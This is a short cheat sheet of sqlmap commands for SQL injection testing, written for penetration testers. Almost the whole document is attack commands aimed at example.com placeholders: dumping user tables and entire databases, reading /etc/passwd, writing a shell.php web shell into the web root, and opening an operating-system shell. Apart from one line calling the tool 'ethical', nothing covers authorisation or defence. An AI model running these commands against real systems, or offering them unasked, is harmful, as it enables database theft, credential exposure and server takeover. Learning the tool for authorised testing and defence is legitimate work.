SQL MAP Cheat Sheet
SQLmap is one of the most popular and powerful open-source tools used for automating SQL injection (SQLi) detection and exploitation. It provides a wide range of features for penetration testers, ethical hackers, and security professionals to test web applications for vulnerabilities related to SQL injection.
Below listed are the commands :
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
sqlmap -u www.target.com --data='id=1' --method PUT
sqlmap -u www.example.com/?id=1 --level=5 --risk=3
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba --dump-all
sqlmap -u "http://www.example.com/?id=1" --schema
sqlmap -u "http://www.example.com/?id=1" --search -T user
sqlmap -u "http://www.example.com/" --data="id=1&csrf token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
sqlmap -u "http://www.example.com/?id=1" --os-shell
Conclusion:
SQLmap has become an indispensable tool for penetration testers and security researchers, largely due to its ease of use, comprehensive features, and powerful capabilities for exploiting SQL injection vulnerabilities. Since its inception in 2006, SQLmap has seen continuous development, gaining widespread adoption in both professional and open-source security communities. Its ability to automate tedious manual processes in vulnerability discovery makes it one of the most trusted and effective tools for SQL injection testing and exploitation.
………………………………………………………………………………….. Hope it’s help……………..